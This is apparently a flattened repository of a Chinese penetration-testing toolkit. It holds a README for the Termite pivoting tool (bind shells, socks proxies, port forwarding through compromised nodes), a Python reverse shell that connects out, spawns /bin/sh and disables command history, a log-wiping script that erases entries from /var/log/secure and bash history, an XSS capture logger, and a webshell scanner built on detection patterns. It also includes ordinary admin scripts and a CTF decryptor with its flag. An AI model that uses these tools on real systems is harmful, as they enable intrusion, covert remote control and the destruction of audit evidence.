以服务模式启动一个agent服务。 8 | 9 | > $ ./agent -l 8888 10 | 11 | 2. 令管理端连接到agent并对agent进行管理。 12 | 13 | > $ ./admin -c 127.0.0.1 -p 8888 14 | 15 | 3. 此时,admin端会得到一个内置的shell, 输入help指令可以得到帮助信息。 16 | 17 | >> help 18 | 19 | 4. 通过show指令可以得到当前agent的拓扑情况。 20 | 21 | >> show 22 | 0M 23 | +-- 1M 24 | 由于当前拓扑中只有一个agent,所以展示结果只有 1M , 25 | 其中1 为节点的ID号, 26 | M为MacOS系统的简写,Linux为L,Windows简写为W。 27 | 28 | 5. 将新agent加入当前拓扑 29 | > ./agent -c 127.0.0.1 -p 8888 30 | 31 | 6. 此时show指令将得到如下效果 32 | 0M 33 | +-- 1M 34 | | +-- 2M 35 | 这表明,当前拓扑中有两个节点,其中由于2节点需要通过1节点才能访问,所以下挂在1节点下方。 36 | 37 | 7. 在2节点开启socks代理,并绑定在本地端口 38 | >> goto 2 39 | 将当前被管理节点切换为 2 号节点。 40 | >> socks 1080 41 | 此时,本地1080 端口会启动个监听服务,而服务提供者为2号节点。 42 | 43 | 8. 在1号节点开启一个shell并绑定到本地端口 44 | >> goto 1 45 | >> shell 7777 46 | 此时,通过nc本地的 7777 端口,就可以得到一个 1 节点提供的 shell. 47 | 48 | 9. 将远程的文件下载至本地 49 | >> goto 1 50 | >> downfile 1.txt 2.txt 51 | 将1 节点,目录下的 1.txt 下载至本地,并命名为2.txt 52 | 53 | 10. 上传文件至远程节点 54 | >> goto 2 55 | >> upfile 2.txt 3.txt 56 | 将本地的 2.txt 上传至 2号节点的目录,并命名为3.txt 57 | 58 | 11. 端口转接 59 | >> goto 2 60 | >> lcxtran 3388 10.0.0.1 3389 61 | 以2号节点为跳板,将 10.0.0.1 的 3389 端口映射至本地的 3388 端口 62 | 63 | 64 | # 更多支持 65 | http://rootkiter.com/toolvideo/toolmp4/1maintalk.mp4 66 | http://rootkiter.com/toolvideo/toolmp4/2socks.mp4 67 | http://rootkiter.com/toolvideo/toolmp4/3lcxtran.mp4 68 | http://rootkiter.com/toolvideo/toolmp4/4shell.mp4 69 | http://rootkiter.com/toolvideo/toolmp4/5file.mp4 70 | 71 | # 联系作者 72 | rootkiter@rootkiter.com 73 | -------------------------------------------------------------------------------- /proxy/Termite/admin_MacOS_x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/admin_MacOS_x64 -------------------------------------------------------------------------------- /proxy/Termite/admin_linux_i586: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/admin_linux_i586 -------------------------------------------------------------------------------- /proxy/Termite/admin_linux_i686: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/admin_linux_i686 -------------------------------------------------------------------------------- /proxy/Termite/admin_linux_x86_64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/admin_linux_x86_64 -------------------------------------------------------------------------------- /proxy/Termite/admin_win32.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/admin_win32.exe -------------------------------------------------------------------------------- /proxy/Termite/agent_MacOS_x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_MacOS_x64 -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_armv4l: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_armv4l -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_armv5l: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_armv5l -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_i586: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_i586 -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_i686: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_i686 -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_m68k: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_m68k -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_mips: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_mips -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_mipsel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_mipsel -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_powerpc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_powerpc -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_powerpc-440fp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_powerpc-440fp -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_sh4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_sh4 -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_sparc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_sparc -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_x86_64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_x86_64 -------------------------------------------------------------------------------- /proxy/Termite/agent_win32.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_win32.exe -------------------------------------------------------------------------------- /scripts/aes_decrypt.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf8 -*- 2 | import sys 3 | from Crypto.Cipher import AES 4 | 5 | 6 | def decrypt_aes(key, data): 7 | obj = AES.new(key, AES.MODE_ECB) 8 | return obj.decrypt(data) 9 | 10 | if __name__ == '__main__': 11 | if len(sys.argv) < 3: 12 | print("%s key encrypt" % sys.argv[0]) 13 | return False 14 | key = sys.argv[1] 15 | data = open(sys.argv[2], 'rb').read() 16 | print(decrypt_aes(key, data)) 17 | -------------------------------------------------------------------------------- /scripts/htpasswd.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin 3 | export PATH 4 | 5 | echo "=====================================" 6 | echo "# A tool like htpasswd for Nginx #" 7 | echo "#-----------------------------------#" 8 | echo "# Author : Virink #" 9 | echo "=====================================" 10 | 11 | #set UserName 12 | username="" 13 | read -p "Please input UserName:" username 14 | if [ "$username" = "" ]; then 15 | echo "Error:UserName can't be NULL!" 16 | exit 1 17 | fi 18 | echo "===========================" 19 | echo "UserName was: $username" 20 | echo "===========================" 21 | 22 | #set password 23 | unpassword="" 24 | read -p "Please input the Password:" unpassword 25 | if [ "$unpassword" = "" ]; then 26 | echo "Error:Password can't be NULL!" 27 | exit 1 28 | fi 29 | echo "===========================" 30 | echo "Password was: $unpassword" 31 | echo "===========================" 32 | password=$(perl -e 'print crypt($ARGV[0], "pwdsalt")' $unpassword) 33 | 34 | 35 | #set htpasswd file 36 | htfile="" 37 | read -p "Please input Auth filename:" htfile 38 | if [ "$htfile" = "" ]; then 39 | echo "Error:Auth filename can't be NULL!" 40 | exit 1 41 | fi 42 | echo "===========================" 43 | echo "Auth File: /etc/nginx/$htfile" 44 | echo "===========================" 45 | 46 | get_char() 47 | { 48 | SAVEDSTTY=`stty -g` 49 | stty -echo 50 | stty cbreak 51 | dd if=/dev/tty bs=1 count=1 2> /dev/null 52 | stty -raw 53 | stty echo 54 | stty $SAVEDSTTY 55 | } 56 | echo "" 57 | echo "Press any key to Creat...or Press Ctrl+c to cancel" 58 | char=`get_char` 59 | 60 | if [ ! -f /etc/nginx/$htfile.conf ]; then 61 | make -p /etc/nginx/$htfile.conf 62 | echo "Create Auth file......" 63 | cat >/etc/nginx/$htfile.conf<" 6 | } -------------------------------------------------------------------------------- /scripts/killphp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | while 1 3 | do 4 | # 重启php-fpm 5 | killall -9 php-fpm || ps -ef | grep php | grep -v 'grep' | awk '{print $2}' | xargs -n1 kill 6 | sleep 10s 7 | done -------------------------------------------------------------------------------- /scripts/python_tty.sh: -------------------------------------------------------------------------------- 1 | python -c 'import pty; pty.spawn("/bin/bash")' -------------------------------------------------------------------------------- /scripts/reset_mysql_root_password.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin 3 | export PATH 4 | 5 | # Check if user is root 6 | if [ $(id -u) != "0" ]; then 7 | echo "Error: You must be root to run this script!" 8 | exit 1 9 | fi 10 | 11 | echo "+-------------------------------------------------------------------+" 12 | echo "| Reset MySQL/MariaDB root Password for LNMP, Written by Licess |" 13 | echo "+-------------------------------------------------------------------+" 14 | echo "| A tool to reset MySQL/MariaDB root password for LNMP |" 15 | echo "+-------------------------------------------------------------------+" 16 | echo "| For more information please visit https://lnmp.org |" 17 | echo "+-------------------------------------------------------------------+" 18 | echo "| Usage: ./reset_mysql_root_password.sh |" 19 | echo "+-------------------------------------------------------------------+" 20 | 21 | if [ -s /usr/local/mariadb/bin/mysql ]; then 22 | DB_Name="mariadb" 23 | DB_Ver=`/usr/local/mariadb/bin/mysql_config --version` 24 | elif [ -s /usr/local/mysql/bin/mysql ]; then 25 | DB_Name="mysql" 26 | DB_Ver=`/usr/local/mysql/bin/mysql_config --version` 27 | else 28 | echo "MySQL/MariaDB not found!" 29 | exit 1 30 | fi 31 | 32 | while :;do 33 | DB_Root_Password="" 34 | read -p "Enter New ${DB_Name} root password: " DB_Root_Password 35 | if [ "${DB_Root_Password}" = "" ]; then 36 | echo "Error: Password can't be NULL!!" 37 | else 38 | break 39 | fi 40 | done 41 | 42 | echo "Stoping ${DB_Name}..." 43 | /etc/init.d/${DB_Name} stop 44 | echo "Starting ${DB_Name} with skip grant tables" 45 | /usr/local/${DB_Name}/bin/mysqld_safe --skip-grant-tables >/dev/null 2>&1 & 46 | sleep 5 47 | echo "update ${DB_Name} root password..." 48 | if echo "${DB_Ver}" | grep -Eqi '^8.0.|^5.7.|^10.2.'; then 49 | /usr/local/${DB_Name}/bin/mysql -u root << EOF 50 | FLUSH PRIVILEGES; 51 | ALTER USER 'root'@'localhost' IDENTIFIED BY '${DB_Root_Password}'; 52 | EOF 53 | else 54 | /usr/local/${DB_Name}/bin/mysql -u root << EOF 55 | update mysql.user set password = Password('${DB_Root_Password}') where User = 'root'; 56 | EOF 57 | fi 58 | 59 | if [ $? -eq 0 ]; then 60 | echo "Password reset succesfully. Now killing mysqld softly" 61 | killall mysqld 62 | sleep 5 63 | echo "Restarting the actual ${DB_Name} service" 64 | /etc/init.d/${DB_Name} start 65 | echo "Password successfully reset to '${DB_Root_Password}'" 66 | else 67 | echo "Reset ${DB_Name} root password failed!" 68 | fi 69 | -------------------------------------------------------------------------------- /scripts/rtcp.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | ''' 4 | filename:rtcp.py 5 | @desc: 6 | 利用python的socket端口转发,用于远程维护 7 | 如果连接不到远程,会sleep 36s,最多尝试200(即两小时) 8 | 9 | @usage: 10 | ./rtcp.py stream1 stream2 11 | stream为:l:port或c:host:port 12 | l:port表示监听指定的本地端口 13 | c:host:port表示监听远程指定的端口 14 | 15 | @author: watercloud, zd, knownsec team 16 | @web: www.knownsec.com, blog.knownsec.com 17 | @date: 2009-7 18 | ''' 19 | 20 | import socket 21 | import sys 22 | import threading 23 | import time 24 | 25 | streams = [None, None] # 存放需要进行数据转发的两个数据流(都是SocketObj对象) 26 | debug = 1 # 调试状态 0 or 1 27 | 28 | def _usage(): 29 | print 'Usage: ./rtcp.py stream1 stream2\nstream : l:port or c:host:port' 30 | 31 | def _get_another_stream(num): 32 | ''' 33 | 从streams获取另外一个流对象,如果当前为空,则等待 34 | ''' 35 | if num == 0: 36 | num = 1 37 | elif num == 1: 38 | num = 0 39 | else: 40 | raise "ERROR" 41 | 42 | while True: 43 | if streams[num] == 'quit': 44 | print("can't connect to the target, quit now!") 45 | sys.exit(1) 46 | 47 | if streams[num] != None: 48 | return streams[num] 49 | else: 50 | time.sleep(1) 51 | 52 | def _xstream(num, s1, s2): 53 | ''' 54 | 交换两个流的数据 55 | num为当前流编号,主要用于调试目的,区分两个回路状态用。 56 | ''' 57 | try: 58 | while True: 59 | #注意,recv函数会阻塞,直到对端完全关闭(close后还需要一定时间才能关闭,最快关闭方法是shutdow) 60 | buff = s1.recv(1024) 61 | if debug > 0: 62 | print num,"recv" 63 | if len(buff) == 0: #对端关闭连接,读不到数据 64 | print num,"one closed" 65 | break 66 | s2.sendall(buff) 67 | if debug > 0: 68 | print num,"sendall" 69 | except : 70 | print num,"one connect closed." 71 | 72 | try: 73 | s1.shutdown(socket.SHUT_RDWR) 74 | s1.close() 75 | except: 76 | pass 77 | 78 | try: 79 | s2.shutdown(socket.SHUT_RDWR) 80 | s2.close() 81 | except: 82 | pass 83 | 84 | streams[0] = None 85 | streams[1] = None 86 | print num, "CLOSED" 87 | 88 | def _server(port, num): 89 | ''' 90 | 处理服务情况,num为流编号(第0号还是第1号) 91 | ''' 92 | srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 93 | srv.bind(('0.0.0.0', port)) 94 | srv.listen(1) 95 | while True: 96 | conn, addr = srv.accept() 97 | print "connected from:", addr 98 | streams[num] = conn # 放入本端流对象 99 | s2 = _get_another_stream(num) # 获取另一端流对象 100 | _xstream(num, conn, s2) 101 | 102 | def _connect(host, port, num): 103 | ''' 处理连接,num为流编号(第0号还是第1号) 104 | 105 | @note: 如果连接不到远程,会sleep 36s,最多尝试200(即两小时) 106 | ''' 107 | not_connet_time = 0 108 | wait_time = 36 109 | try_cnt = 199 110 | while True: 111 | if not_connet_time > try_cnt: 112 | streams[num] = 'quit' 113 | print('not connected') 114 | return None 115 | 116 | conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 117 | try: 118 | conn.connect((host, port)) 119 | except Exception, e: 120 | print ('can not connect %s:%s!' % (host, port)) 121 | not_connet_time += 1 122 | time.sleep(wait_time) 123 | continue 124 | 125 | print "connected to %s:%i" % (host, port) 126 | streams[num] = conn #放入本端流对象 127 | s2 = _get_another_stream(num) #获取另一端流对象 128 | _xstream(num, conn, s2) 129 | 130 | 131 | if __name__ == '__main__': 132 | if len(sys.argv) != 3: 133 | _usage() 134 | sys.exit(1) 135 | tlist = [] # 线程列表,最终存放两个线程对象 136 | targv = [sys.argv[1], sys.argv[2] ] 137 | for i in [0, 1]: 138 | s = targv[i] # stream描述 c:ip:port 或 l:port 139 | sl = s.split(':') 140 | if len(sl) == 2 and (sl[0] == 'l' or sl[0] == 'L'): # l:port 141 | t = threading.Thread(target=_server, args=(int(sl[1]), i)) 142 | tlist.append(t) 143 | elif len(sl) == 3 and (sl[0] == 'c' or sl[0] == 'C'): # c:host:port 144 | t = threading.Thread(target=_connect, args=(sl[1], int(sl[2]), i)) 145 | tlist.append(t) 146 | else: 147 | _usage() 148 | sys.exit(1) 149 | 150 | for t in tlist: 151 | t.start() 152 | for t in tlist: 153 | t.join() 154 | sys.exit(0) 155 | -------------------------------------------------------------------------------- /scripts/scanwebshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | #__Author__ = virink 5 | #__Blog__ = https://www.virzz.com 6 | 7 | import os 8 | import sys 9 | import commands 10 | import re 11 | import time 12 | import base64 13 | import platform 14 | 15 | rulelist = [ 16 | '(\$_(GET|POST|REQUEST)\[.{0,15}\]\s{0,10}\(\s{0,10}\$_(GET|POST|REQUEST)\[.{0,15}\]\))', 17 | '(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))', 18 | '(eval(\s|\n)*\(base64_decode(\s|\n)*\((.|\n){1,200})', 19 | '((eval|assert)(\s|\n)*\((\s|\n)*\$_(POST|GET|REQUEST)\[.{0,15}\]\))', 20 | '(\$[\w_]{0,15}(\s|\n)*\((\s|\n)*\$_(POST|GET|REQUEST)\[.{0,15}\]\))', 21 | '(call_user_func\(.{0,15}\$_(GET|POST|REQUEST))', 22 | '(preg_replace(\s|\n)*\(.{1,100}[/@].{0,3}e.{1,6},.{0,10}\$_(GET|POST|REQUEST))', 23 | '(wscript\.shell)', 24 | '(cmd\.exe)', 25 | '(shell\.application)', 26 | '(documents\s+and\s+settings)', 27 | '(serv-u)', 28 | '(phpspy)', 29 | '(jspspy)', 30 | '(webshell)', 31 | '(Program\s+Files)' 32 | ] 33 | 34 | 35 | def ScanShell(path): 36 | for root, dirs, files in os.walk(path): 37 | for filespath in files: 38 | if filespath.find('.php') > 0 or filespath.find('.inc') > 0: 39 | file = open(os.path.join(root, filespath)) 40 | filestr = file.read() 41 | file.close() 42 | for rule in rulelist: 43 | result = re.compile(rule).findall(filestr) 44 | if result: 45 | print os.path.join(root, filespath) + '\r\n' 46 | break 47 | 48 | ############################################## 49 | if __name__ == '__main__': 50 | print ''' 51 | \t\t######################################### 52 | \t\t# AppName : Scan Shell # 53 | \t\t# Author : Virink # 54 | \t\t# Blog : https://www.virzz.com # 55 | \t\t#########################################\r\n''' 56 | if platform.system() != 'Linux': 57 | print '\tPlease Run in Linux' 58 | exit() 59 | if len(sys.argv) != 2: 60 | print '\tRun error\r\n\tUsage:python ' + sys.argv[0] + ' website_path\r\n\teg : python ' + sys.argv[0] + ' /root/www\r\n' 61 | exit() 62 | webroot = sys.argv[1] 63 | # Start scan webshell 64 | print '\tStart scan webshell' 65 | ScanShell(webroot) 66 | print '\tFinish scan webshell' 67 | -------------------------------------------------------------------------------- /scripts/shell_53_udp.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | #!/usr/bin/env python 3 | """ 4 | back connect py version,only linux have pty module 5 | code by google security team 6 | UDP by anthrax@insight-labs.org 7 | """ 8 | import sys,os,socket,pty 9 | shell = "/bin/sh" 10 | def usage(name): 11 | print 'python reverse connector' 12 | print 'usage: %s [udp]' % name 13 | 14 | def main(): 15 | if len(sys.argv) <3: 16 | usage(sys.argv[0]) 17 | sys.exit() 18 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 19 | try: 20 | if sys.argv[3]=='udp': 21 | s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) 22 | except:pass 23 | try: 24 | s.connect((sys.argv[1],int(sys.argv[2]))) 25 | print 'connect ok' 26 | except: 27 | print 'connect faild' 28 | sys.exit() 29 | os.dup2(s.fileno(),0) 30 | os.dup2(s.fileno(),1) 31 | os.dup2(s.fileno(),2) 32 | global shell 33 | os.unsetenv("HISTFILE") 34 | os.unsetenv("HISTFILESIZE") 35 | os.unsetenv("HISTSIZE") 36 | os.unsetenv("HISTORY") 37 | os.unsetenv("HISTSAVE") 38 | os.unsetenv("HISTZONE") 39 | os.unsetenv("HISTLOG") 40 | os.unsetenv("HISTCMD") 41 | os.putenv("HISTFILE",'/dev/null') 42 | os.putenv("HISTSIZE",'0') 43 | os.putenv("HISTFILESIZE",'0') 44 | pty.spawn(shell) 45 | s.close() 46 | 47 | if __name__ == '__main__': 48 | main() -------------------------------------------------------------------------------- /scripts/socks5.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Python Dynamic Socks5 Proxy 3 | # Usage: python socks5.py 1080 4 | # Background Run: nohup python s5.py 1080 & 5 | 6 | import socket, sys, select, SocketServer, struct, time 7 | 8 | class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass 9 | class Socks5Server(SocketServer.StreamRequestHandler): 10 | def handle_tcp(self, sock, remote): 11 | fdset = [sock, remote] 12 | while True: 13 | r, w, e = select.select(fdset, [], []) 14 | if sock in r: 15 | if remote.send(sock.recv(4096)) <= 0: break 16 | if remote in r: 17 | if sock.send(remote.recv(4096)) <= 0: break 18 | def handle(self): 19 | try: 20 | pass # print 'from ', self.client_address nothing to do. 21 | sock = self.connection 22 | # 1. Version 23 | sock.recv(262) 24 | sock.send("\x05\x00"); 25 | # 2. Request 26 | data = self.rfile.read(4) 27 | mode = ord(data[1]) 28 | addrtype = ord(data[3]) 29 | if addrtype == 1: # IPv4 30 | addr = socket.inet_ntoa(self.rfile.read(4)) 31 | elif addrtype == 3: # Domain name 32 | addr = self.rfile.read(ord(sock.recv(1)[0])) 33 | port = struct.unpack('>H', self.rfile.read(2)) 34 | reply = "\x05\x00\x00\x01" 35 | try: 36 | if mode == 1: # 1. Tcp connect 37 | remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 38 | remote.connect((addr, port[0])) 39 | pass # print 'To', addr, port[0] nothing do to. 40 | else: 41 | reply = "\x05\x07\x00\x01" # Command not supported 42 | local = remote.getsockname() 43 | reply += socket.inet_aton(local[0]) + struct.pack(">H", local[1]) 44 | except socket.error: 45 | # Connection refused 46 | reply = '\x05\x05\x00\x01\x00\x00\x00\x00\x00\x00' 47 | sock.send(reply) 48 | # 3. Transfering 49 | if reply[1] == '\x00': # Success 50 | if mode == 1: # 1. Tcp connect 51 | self.handle_tcp(sock, remote) 52 | except socket.error: 53 | pass #print 'error' nothing to do . 54 | except IndexError: 55 | pass 56 | def main(): 57 | filename = sys.argv[0]; 58 | if len(sys.argv)<2: 59 | print 'usage: ' + filename + ' port' 60 | sys.exit() 61 | socks_port = int(sys.argv[1]); 62 | server = ThreadingTCPServer(('', socks_port), Socks5Server) 63 | print 'bind port: %d' % socks_port + ' ok!' 64 | server.serve_forever() 65 | if __name__ == '__main__': 66 | main() -------------------------------------------------------------------------------- /scripts/xssget.php: -------------------------------------------------------------------------------- 1 | filename = $filename; 8 | } 9 | 10 | public function Flow() 11 | { 12 | /* Method */ 13 | $flowdata['method'] = $_SERVER['REQUEST_METHOD']; 14 | /* Header */ 15 | $arr = array( 16 | 'HTTP_HOST', 17 | 'HTTP_REFERER', 18 | 'HTTP_USER_AGENT' 19 | // 'HTTP_ACCEPT', 20 | // 'HTTP_ACCEPT_LANGUAGE', 21 | // 'HTTP_ACCEPT_ENCODING', 22 | // 'HTTP_CONNECTION' 23 | ); 24 | foreach($arr as $key){ 25 | $flowdata['Header'][ucwords(strtolower(str_replace("HTTP_", "", $key)))] = $_SERVER[$key]; 26 | } 27 | /* Url */ 28 | $flowdata['uri'] = $_SERVER['REQUEST_URI']; 29 | /* Protocol */ 30 | $flowdata['protocol'] = $_SERVER['SERVER_PROTOCOL']; 31 | /* IP */ 32 | $flowdata['ip'] = array( 33 | 'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'], 34 | 'CLIENT_IP'=>$_SERVER['HTTP_CLIENT_IP'], 35 | 'X_FORWARDED_FOR'=>$_SERVER['HTTP_X_FORWARDED_FOR'] 36 | ); 37 | /* Time */ 38 | $flowdata['time'] = date('Y-m-d H:i:s',$_SERVER['REQUEST_TIME']); 39 | /* CONTENT_TYPE */ 40 | $flowdata['ctype'] = $_SERVER['CONTENT_TYPE']; 41 | /* PostData */ 42 | if(isset($_POST) or strtolower($flowdata['Method']) == 'post' ){ 43 | if($flowdata['ctype'] == 'application/x-www-form-urlencoded'){ 44 | $flowdata['post'] = $_post; 45 | }else{ 46 | $flowdata['post'] = file_get_contents('php://input'); 47 | } 48 | } 49 | $this->WriteFile($this->filename,print_r($flowdata,true),FILE_APPEND); 50 | } 51 | 52 | public function WriteFile($filename,$content,$FILE_APPEND=FILE_APPEND) 53 | { 54 | file_put_contents($filename,$content,$FILE_APPEND); 55 | } 56 | } 57 | 58 | $Catchs = new GetFromXSS('log.txt'); 59 | $Catchs->Flow(); 60 | ?> -------------------------------------------------------------------------------- /scripts/xxtea_decrypt.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | // flag{xxtea_1s_1nterest1ng_ha-_-ha} 7 | 8 | #define DELTA 0x9e3779b9 // 2654435769 9 | #define MX (((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4)) ^ ((sum ^ y) + (key[(p & 3) ^ e] ^ z))) 10 | 11 | 12 | void btea(uint32_t *, int, uint32_t const key[4]); 13 | void pack(uint64_t *, uint32_t, uint32_t); 14 | void unpack(uint64_t , uint32_t *, uint32_t *); 15 | 16 | char crypt[300]="\x56\x95\xd7\xfb\x7b\xd5\xb4\x8b\xe6\xd2\xba\xa4\x4c\x71\x52\xa4\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\xba\xcb\xc5\x6d\xa2\x07\x9a\x78\x3b\x62\x5f\x64\xfd\x5e\x02\x03\x3a\x7a\x4c\x9f\x14\xee\xf6\xeb\x3a\x7a\x4c\x9f\x14\xee\xf6\xeb\xcc\x28\x37\x81\xe9\x24\xa6\x8f\xb1\x79\xb6\x74\x2b\xd6\x4b\xce\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\xbb\x9b\x6c\x63\x7d\xc2\xfe\x13\x0d\xc8\xb3\x93\x3b\x34\x01\x25\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\xbb\x9b\x6c\x63\x7d\xc2\xfe\x13\x5b\xc0\x36\xe1\x62\xa1\x59\xe1\xcc\x28\x37\x81\xe9\x24\xa6\x8f\xb1\x79\xb6\x74\x2b\xd6\x4b\xce\x18\xb7\x12\xac\x14\x40\x5c\xca\xb1\x79\xb6\x74\x2b\xd6\x4b\xce\x0d\xc8\xb3\x93\x3b\x34\x01\x25\xcc\x28\x37\x81\xe9\x24\xa6\x8f\xbb\x9b\x6c\x63\x7d\xc2\xfe\x13\x5b\xc0\x36\xe1\x62\xa1\x59\xe1\xba\xcb\xc5\x6d\xa2\x07\x9a\x78\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\x16\x31\x4b\x54\xef\x95\xa5\x49\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\x1f\x27\x75\xa5\x94\x46\x27\xe3\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\x1f\x27\x75\xa5\x94\x46\x27\xe3\x16\x31\x4b\x54\xef\x95\xa5\x49\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\xd8\xf3\x37\x26\x1f\x46\xff\x17\x5d\x88\x2e\x70\xef\xd7\x12\xb3"; 17 | 18 | 19 | int main(int argc, char *argv[]) 20 | { 21 | uint32_t key[4] = {0x342d3221, 0x4320fa22, 0x46257a42, 0x9002bf22}; 22 | uint64_t b64; 23 | uint32_t b64_split[2]; 24 | int ji=0; 25 | 26 | while (1) { 27 | if (ji>=35) { 28 | return 0; 29 | } 30 | memcpy(&b64,&crypt[8*ji],8); 31 | //fread(&b64, sizeof(uint64_t), 1, stdin); 32 | if (b64 == 0x00000000ffffffff) 33 | break; 34 | unpack(b64, &b64_split[0], &b64_split[1]); 35 | 36 | btea(b64_split, -2, key); 37 | 38 | pack(&b64, b64_split[0], b64_split[1]); 39 | 40 | putc(b64, stdout); 41 | 42 | ji+=1; 43 | } 44 | 45 | return 0; 46 | } 47 | 48 | 49 | void btea(uint32_t *v, int n, uint32_t const key[4]) 50 | { 51 | uint32_t y, z, sum; 52 | unsigned p, rounds, e; 53 | n = -n; 54 | rounds = 6 + 52/n; 55 | sum = rounds * DELTA; 56 | y = v[0]; 57 | do { 58 | e = (sum >> 2) & 3; 59 | for (p = n - 1; p > 0; p--) { 60 | z = v[p - 1]; 61 | y = v[p] -= MX; 62 | } 63 | z = v[n - 1]; 64 | y = v[0] -= MX; 65 | sum -= DELTA; 66 | } while (--rounds); 67 | } 68 | 69 | 70 | void pack(uint64_t *b64, uint32_t b32_0, uint32_t b32_1) 71 | { 72 | *b64 = ((uint64_t) b32_0) << 32 | b32_1; 73 | } 74 | 75 | 76 | void unpack(uint64_t b64, uint32_t *b32_0, uint32_t *b32_1) 77 | { 78 | *b32_0 = (uint32_t)((b64 & 0xFFFFFFFF00000000) >> 32); 79 | *b32_1 = (uint32_t)(b64 & 0xFFFFFFFF); 80 | } 81 | -------------------------------------------------------------------------------- /sh/clear_log.sh: -------------------------------------------------------------------------------- 1 | sed -i '/publickey/d' /var/log/secure \ 2 | && sed -i '/log/d' ~/.bash_history \ 3 | && sed -i '/history/d' ~/.bash_history \ 4 | && sed -i '/sed/d' ~/.bash_history \ 5 | && sed -i '/sh/d' ~/.bash_history 